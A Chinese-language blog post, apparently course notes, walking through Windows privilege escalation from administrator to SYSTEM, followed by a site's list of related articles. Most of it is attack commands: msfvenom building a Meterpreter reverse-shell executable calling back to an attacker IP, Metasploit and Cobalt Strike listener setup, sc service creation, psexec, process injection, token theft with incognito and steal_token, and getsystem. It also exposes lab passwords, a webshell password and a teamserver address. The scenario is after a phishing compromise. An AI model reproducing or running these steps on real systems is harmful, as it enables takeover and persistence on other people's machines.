权限提升 -Win系统权限升级

于 2024-08-30 11:17:25 发布
阅读量539 收藏 1
点赞数 7
分类专栏: windwos权限提升 文章标签: windwos权限提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/141713268
版权

3 权限提升 -Win系统权限升级

1、计算机⽤户到System-⼊⼝点和应⽤点
2、计算机⽤户到System-服务启动&远程管理
3、计算机⽤户到System-进程注⼊&令牌窃取

# administrator⽤户到system
# 降权的话类似选择低权限的即可

应用场景

1、常规某个机器被钓⻥后⻔攻击后,我们需要做更⾼权限操作或权限维持等。

2、内⽹域中某个机器被钓⻥后⻔攻击后,我们需要对后续内⽹域做安全测试。

1.本地管理用户-服务启动

1.简要步骤

sc是⽤于与服务控制管理器和服务进⾏通信的命令⾏程序。
适⽤版本:windows 7、10、08、12、16、19、22,早期⽤at命令
1、创建⼀个名叫syscmd的执⾏⽂件服务
sc Create syscmd binPath= "c:\msf.exe"
2、运⾏服务
sc start syscmd

2.详细步骤

2.1环境
/操作系统/提权/Windows Server 2016-tiquan.ova
系统⽤户rsec 登录密码 rsec123456
系统⽤户administrator 登录密码 Rsec123456   
http://192.168.220.137/1.aspx 哥斯拉密码pass

# 使⽤administrator⽤户登录
# 关闭⾃带杀毒

image-20240830104205796

2.2. sc提权过程
# sc是⽤于与服务控制管理器和服务进⾏通信的命令⾏程序。
适⽤版本:windows 7、10、08、12、16、19、22,早期⽤at命令

#1. ⽣成msf反弹⻢
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.197.135 lport=4444 -f exe >rsec.exe

# kali开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.197.135 
set lport 4444

# 虽然连接上了但是当Windows启动服务器失败时连接就会断开....因此需要设置进程迁移,在MSF
中设置有session过来就会做进程迁移.... 
set AutoRunScript migrate -f
run 


# 2、创建⼀个名叫syscmd的执⾏⽂件服务
sc Create syscmd binPath= "c:\rsec.exe"

# 创建⼀个名叫syscmd的新的交互式的cmd执⾏服务(或者启动⼀个cmd)
sc Create syscmd binPath= "cmd /K start" type= own type= interact

连接上进程启动失败:

image-20240830103317105

image-20240830103229377

2.本地管理⽤户–远程管理

1.简要步骤

#PSTools-微软自带工具
下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
运行:psexec.exe -accepteula -s -i -d cmd #调⽤运⾏cmd

2.详细步骤

# 微软⾃带的⼀个⼯具包,远程执⾏进程的⼀个⼯具,该⼯具可以作为权限提升⼯具
psexec.exe -accepteula -s -i -d cmd

image-20240830104918261

3.本地管理⽤户-进程注⼊

1.检测

MSF:
ps //查看进程
migrate PID //迁移对应PID
CS:
ps //查看进程
inject PID //注⼊对应PID

2.详细步骤

2.1. msf进程注⼊
# ⽣成msf反弹⻢
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.197.135 lport=4444 -f exe >rsec.exe

# kali开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.220.163 
set lport 4444

# administrator⽤户登录后上线msf⻢

image-20240830105523857

# 查看权限
getuid
# 查看进程
ps
# 迁移对应PID
migrate PID
migrate 1004
# 查看权限已经变成了system权限
getuid

image-20240830105649708

image-20240830105712285

2.2. cs进程注⼊
# 阿⾥云启动cs服务端
./teamserver 43.129.198.242 123
# 本地连接cs服务端并⽣成cs⽊⻢

上线成功

image-20240830105836922

# 查看进程
ps
# 注⼊对应PID,并选择上线监听器后,即可⾃动上线,注意msf前期操作过就会有点冲突,可以重启
下
inject PID
inject 2776
# 图像化注⼊可以进⼊进程列表进⾏注⼊测试

命令行注入

image-20240830110002077

image-20240830110009937

图形化注入

image-20240830110548436

image-20240830110621635

4.本地管理⽤户-令牌窃取

1.详细步骤

MSF:
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
CS:
ps //查看进程
steal_token PID //窃取进程令牌
spawnu PID //窃取进程令牌上线

2.详细步骤

2.1. msf令牌窃取
# ⽣成msf反弹⻢
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.220.163 lport=4444 -f exe >rsec.exe

# kali开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.220.163 
set lport 4444

# administrator⽤户登录后上线msf⻢

双击木马反弹成功

image-20240830111232627

# 使⽤令牌窃取模块
use incognito
# 列出可以窃取的⽤户
list_tokens -u
# 进⾏令牌窃取
impersonate_token "NT AUTHORITY\SYSTEM"

image-20240830111358499

image-20240830111343143

2.2cs窃取
# 查看进程
ps
# 窃取进程令牌steal_token PID
steal_token 3056
# 窃取进程令牌上线spawnu PID
spawnu 3056

image-20240830111436203

2.3 getsystem自动提权
# msf⾃动提权getsystem,该命令会⾃动采⽤上述所有⽅式进⾏⾃动提权

image-20240830111507867

# cs⾃动提权getsystem,该命令会⾃动采⽤上述所有⽅式进⾏⾃动提权
getsystem
getuid

image-20240830111524639

黑白时光les
关注
专栏目录
Win10获得system权限(即超级管理员)
weixin_39552387的博客
03-10 9959
某一个文件进行操作需要获取system权限。(比较安全,因为只是这个文件夹,反正你要删掉了) 5.1.右键文件夹,选择“属性”,选择"安全",点击右下角的“高级”按钮。 5.2.点击所有者后面的“更改” 5.3.在对象名称中输入“everyone”,点击“检查名称”,看到everyone变为“Everyone”后点击确定。 5.4.勾选“替换子容器和对象的所有者”,在弹出的对话框中选择“确定”即可。 5.5.就可以删除文件了。不需要重启哦。 5.6 这个方法是在微软官方社区看到的。这里附上链接并
系统权限提升
weixin_44603865的博客
04-01 1154
要了解提权方法对应的层面,在不适应的层面,提权可能无效提权方法对应系统版本相关文件及后门免杀问题。
windows系统权限提升
weixin_53639243的博客
04-23 2993
提权方法。
Win10获得system(即超级管理员)权限
Lily_25的博客
01-11 1万+
Win10如何获得system(即超级管理员)权限
Windows】一招教你 100% 成功获取管理员权限提升为管理员账户
最新发布
WHNdeCSDN的博客
06-15 1万+
众所周知直接使用管理员账户作为主账户的好处是很多的,因为不会遇到一些权限问题,具体有哪些好处想必各位都有所体会,这里就不多赘述了。本文将分为三种常见情形以及其对应的方法,分别教教大家如何正确的获取管理员权限或将当前用户提升至管理员。
管理员取得所有权
风流倜傥唐伯虎的博客
04-16 2673
WIN7: Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\*\shell\runas] @=“管理员取得所有权” “NoWorkingDirectory”=“” [HKEY_CLASSES_ROOT\*\shell\runas\command] @=“cmd.exe /c takeown /f \”%1\“ &...
nexus-3.65.0-02-win64
04-19
标题中的“nexus-3.65.0-02-win64”指的是Nexus的特定版本,适用于Windows 64位操作系统,这一版本为3.65.0-02。 1. **Nexus的基本功能** - **仓库管理**:Nexus支持多种类型的仓库,包括Maven、npm、RubyGems、...
nexus-3.38.0-01-win64.zip
03-10
- 安全更新:关注Sonatype发布的Nexus新版本,及时升级以修复安全漏洞和提升性能。 6. **与其他工具的集成** - Jenkins、GitLab CI/CD等持续集成工具可与Nexus结合,实现自动化构建、测试和部署。 - Nexus可以与...
nexus-3.18.1-01-win64.zip
09-04
总结,"nexus-3.18.1-01-win64.zip"是一个适用于Windows 64位系统的Nexus仓库管理器的最新版本,包含了丰富的功能和优化,旨在提升开发团队的工作效率和项目的稳定性。通过合理的配置和使用,Nexus能成为企业软件...
nexus-3.29.1-01-win64.zip
12-29
标题中的“nexus-3.29.1-01-win64.zip”指的是Nexus Repository Manager的一个特定版本,3.29.1-01,适用于Windows 64位系统的安装包。Nexus Repository Manager是一款由Sonatype公司开发的强大且灵活的软件仓库管理...
Windows权限提升---信息收集
qq_40012781的博客
07-02 808
Windows系统中,权限大概分为四种
win10永久获取管理员权限的办法
xitongzhijianet的博客
03-27 2475
大家在使用电脑的时候经常会遇到需要管理员权限才能操作的情况,那么win10系统的管理员权限怎么获取呢?2、依次选择“疑难解答-高级选项-启动设置”,以启用安全模式的方式进入Windows操作系统。1、按住Shift后点击“重启”,进入“高级启动”选项(设置-更新和安全-恢复也可以进入)。4、在Administrator属性框中,将“账户已禁用”的勾去掉,点击【确定】。3、进入安全模式后,再开始菜单单击鼠标右键,选择【命令提示符(管理员)】。1、在开始菜单上单击鼠标右键,在弹出的菜单上点击【计算机管理】。
win10 进入system账户权限
wem520的专栏
04-27 1万+
废话不多说直接上步骤,小白也能完成: 1、进入C:\Windows\System32 目录将Narrator.exe 重命名为1.exe。然后将cmd.exe 重命名为Narrator.exe。 在重命名的时候会报权限不足,请按照如下步骤操作: ...
[Windows10]Win10如何获取最高管理员权限
热门推荐
yanhanhui1的博客
09-17 28万+
使用Windows10的时候常常发现我们没有管理员权限,这对我们使用造成了巨大麻烦。今天我来分享一下 win10里面怎么获取最高管理员权限。 (一)Windows10专业版/企业版/教育版方法 1,按下win+R键唤出“运行”窗口,输入gpedit.msc。 2,这时打开了组策略编辑器,在左边找到“计算机配置-Windows 设置”,再进入右边“安全设置”,如图。 3,进入...
Windows10一句话从administrator权限提升到system权限
末初的CSDN博客
06-18 9917
在Twitter看到的,转载出来分享一下 powershell -ep bypass "Install-Module -Name NtObjectManager;start-Win32ChildProcess cmd"
计算机 取得高级权限,win10获取system权限,win7获取最高权限
weixin_35029653的博客
07-25 1336
在使用电脑的过程中,经常需要通过修改注册表的某些项目或值来对系统进行设置,但是很多时候会出现没有权限修改的情况,那么这个时候我们只能获取TrustedInstaller超级权限来进行操作,那么如何获取windows10系统TrustedInstaller超级权限呢?注:TrustedInstaller超级权限是凌驾于管理员权限系统权限之上的存在,在《Win10如何让控制面板在“此电脑”中显示?》...
权限提升-windows内核溢出漏洞提权
weixin_39430198的博客
03-14 1733
一、课时目标 1、理解权限提升的原理和目的 2、掌握常规提权的思路和方法 二、权限提升 2.1 什么是提权 提权,就是提高自己在服务器中的权限。比如在windows下从普通用户提升到administrator或者system权限,linux下普通用户提升到root权限。 2.2 为什么要提权 用户的权限决定了其能够访问的资源。在渗透测试中,我们通过某种方式(比如上传webshell)获取到一个执行命令的shell,但它是一个低权限用户,所以不能执行某些系统命令或者访问某些关键系统资源。此时如果我们想要获取更
win10下 你需要来自trustedinstaller的权限 修改权限
drbing的博客
03-14 21万+
1、右击需要修改的文件-属性 2、点高级 3、点击更改 4、再点击高级 5、点击立即查找,会在下方出来许多用户,找你自己需要修改权限的用户,点击确定即可,切换到界面 然后再点击确定,出现一个界面再确定,然后就可以再这个界面 点击编辑,根据自己需要修改权限
内网渗透总结一:第一步提权
yggcwhat
05-06 2479
内网渗透总结一:第一步提权!!!
WIN7获取管理员权限的两种实用方法
这种方法提供了一次性的权限提升,关闭窗口后权限会恢复为原来的用户权限。对于需要频繁使用管理员权限的情况,可以考虑采用其他方式。 方法二:永久更改用户权限 另一种长期解决方案是通过控制面板中的用户账户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值